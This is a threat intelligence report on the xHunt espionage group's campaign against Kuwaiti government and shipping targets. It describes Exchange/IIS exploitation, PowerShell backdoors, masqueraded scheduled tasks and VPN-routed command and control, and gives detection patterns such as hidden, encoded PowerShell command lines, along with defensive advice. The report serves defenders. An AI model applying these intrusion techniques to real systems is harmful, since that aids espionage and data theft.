xHunt Espionage Group Returns, Targeting Kuwait with New PowerShell Backdoors
Cyber-Espionage Group xHunt Resurfaces with Campaign Targeting Kuwaiti Government and Shipping Sectors
Related Entities
Threat Actors
Products & Tech
Other
Full Report
Executive Summary
The cyber-espionage group known as xHunt has been attributed to a new wave of attacks targeting organizations within Kuwait. The campaign, active since at least 2018, continues its focus on strategic sectors, including shipping, transportation, and government entities. The threat actor's primary method involves exploiting vulnerabilities in public-facing Microsoft Exchange and IIS web servers to gain initial access. Following infiltration, xHunt deploys a suite of custom PowerShell-based backdoors for long-term persistence and data exfiltration. The group's consistent TTPs, including its unique anime-themed naming convention for its malware, and its focus on specific geographies and industries, mark it as a persistent and targeted threat focused on intelligence gathering.
Threat Overview
xHunt is a sophisticated threat actor believed to be engaged in state-sponsored espionage. Their operations demonstrate a clear and consistent focus on Kuwait, suggesting a specific intelligence requirement related to the country's government and key economic sectors. The group's modus operandi involves gaining access to edge servers and then deploying lightweight, often fileless, backdoors to conduct reconnaissance and steal information over a prolonged period.
The group is known for its distinctive malware naming convention, borrowing from the anime series Hunter x Hunter. Tools observed in past and present campaigns include Hisoka, Sakabota, Netero, Killua, TriFive, and Snugy. This unique characteristic helps researchers cluster and track their activity.
Technical Analysis
xHunt's TTPs show a methodical approach to intrusion and persistence.
Initial Access: The group primarily targets public-facing web servers. This likely involves the exploitation of known vulnerabilities in Microsoft Exchange and IIS, such as ProxyShell, ProxyLogon, or other recently disclosed flaws (
T1190 - Exploit Public-Facing Application).Execution & Persistence: After gaining access, xHunt deploys PowerShell-based backdoors. PowerShell is a favored tool for its power and ability to execute in-memory, making it harder to detect (
T1059.001 - PowerShell). Persistence is often achieved by creating scheduled tasks that mimic legitimate system tasks, a common defense evasion technique (T1053.005 - Scheduled Task).Defense Evasion: The group actively works to evade detection. They have been observed using VPN services with rotating IP addresses across various European nodes for their command-and-control (C2) infrastructure. This complicates IP-based blocking and attribution (
T1090.003 - Multi-hop Proxy). Their use of legitimate-sounding task names is another example of masquerading (T1036.005 - Match Legitimate Name or Location).Command and Control: The PowerShell backdoors communicate with the C2 servers to receive commands and exfiltrate stolen data. The traffic is likely encrypted and sent over standard protocols like HTTP/S to blend in with normal network activity (
T1071.001 - Web Protocols).
Impact Assessment
The primary impact of xHunt's operations is espionage. The theft of sensitive government or commercial data from the shipping and transportation sectors can provide significant strategic advantages to the group's sponsor. This could include insight into government policies, economic activity, or critical infrastructure operations. While not directly destructive like ransomware, the long-term intelligence loss can be highly damaging to a nation's security and economic interests. The compromise of key infrastructure also introduces the risk of future disruptive attacks.
IOCs
No specific Indicators of Compromise were provided in the source articles.
Cyber Observables for Detection
| Type | Value | Description |
|---|---|---|
| command_line_pattern | powershell.exe -enc or powershell.exe -nop -w hidden |
Suspicious PowerShell execution with encoded commands or in a hidden window on Exchange/IIS servers. |
| process_name | w3wp.exe |
The IIS worker process spawning anomalous child processes like powershell.exe or cmd.exe. |
| log_source | Exchange/IIS access logs | Look for suspicious requests to exploit known vulnerabilities or access to web shell files. |
| file_name | Hisoka, Sakabota, Netero, Killua |
Filenames or strings in memory matching the known toolset of the xHunt group. |
Detection & Response
- PowerShell Logging: Enable enhanced PowerShell logging (Module Logging, Script Block Logging, Transcription) across all servers, especially Exchange and IIS. Forward these logs to a SIEM for analysis. This allows detection of malicious scripts even if they are obfuscated or fileless. This is a form of Process Analysis (D3-PA).
- EDR on Servers: Deploy a robust EDR solution on all web and mail servers. Configure it to alert on suspicious process chains (e.g.,
w3wp.exespawning PowerShell) and the creation of new scheduled tasks. - Network Egress Filtering: Restrict outbound traffic from servers to only what is required for business purposes. Monitor for and block connections to known VPN provider IP ranges from servers that have no business reason to use them. This relates to Outbound Traffic Filtering (D3-OTF).
Mitigation
- Patch Management: Aggressively patch all public-facing systems, particularly Microsoft Exchange and IIS, to close the initial access vectors used by xHunt. See Software Update (D3-SU).
- Attack Surface Reduction: Limit the exposure of management interfaces. Use multi-factor authentication for all external access.
- PowerShell Hardening: Implement PowerShell Constrained Language Mode where full language capabilities are not required. This can significantly limit the effectiveness of PowerShell-based backdoors.
- Least Privilege: Ensure that the service accounts running IIS and Exchange have the minimum necessary privileges and cannot be used for broad network access.
Timeline of Events
MITRE ATT&CK Mitigations
Update Software
Aggressively patch public-facing Microsoft Exchange and IIS servers to prevent initial access.
Mapped D3FEND Techniques:
Behavior Prevention on Endpoint
Use EDR to detect and block suspicious process chains, such as IIS spawning PowerShell.
Filter Network Traffic
Implement strict egress filtering to block outbound connections from servers to untrusted destinations.
Mapped D3FEND Techniques:
D3FEND Defensive Countermeasures
To defend against the xHunt group's primary initial access vector, organizations must maintain a rigorous and aggressive software update regimen for all internet-facing systems. Specifically, Microsoft Exchange and IIS servers, the reported targets, must be prioritized for patching. This involves subscribing to vendor security notifications, using vulnerability scanning tools to continuously identify missing patches, and having an established process for testing and deploying critical security updates rapidly. Given xHunt's targeting of known vulnerabilities, a proactive patching posture is the most effective way to deny them their entry point into the network. Failure to patch these critical edge services is equivalent to leaving the front door unlocked for a determined espionage group.
Detecting xHunt's post-exploitation activity relies heavily on Process Analysis, particularly monitoring PowerShell usage on servers. Organizations must enable comprehensive PowerShell logging (Script Block Logging Event ID 4104 and Module Logging Event ID 4103) on all Exchange and IIS servers. These logs should be ingested into a SIEM. Create detection rules to alert on suspicious process parent-child relationships, such as the IIS worker process (w3wp.exe) or Exchange services spawning powershell.exe. Further, analyze the content of PowerShell scripts for suspicious commands related to network reconnaissance, credential theft (e.g., Mimikatz invocations), or creating new scheduled tasks for persistence. This allows the security team to spot the custom backdoors used by xHunt even when they are heavily obfuscated.
To disrupt xHunt's command and control, implement strict Outbound Traffic Filtering (egress filtering) on server network segments. By default, servers like Microsoft Exchange and IIS should not be allowed to initiate arbitrary connections to the internet. A firewall policy should be created that explicitly denies all outbound traffic from these servers and only allows connections required for their function (e.g., sending email on port 25, DNS lookups on port 53). Since xHunt is known to use rotating IPs on VPN services, blocking outbound connections to known VPN provider IP ranges can also be effective. This 'deny-by-default' stance makes it much more difficult for their PowerShell backdoors to establish a C2 channel, potentially preventing data exfiltration and allowing defenders to contain the breach.
Sources & References
Article Author
Jason Gomes
• Cybersecurity PractitionerCybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.
Tags
📢 Share This Article
Help others stay informed about cybersecurity threats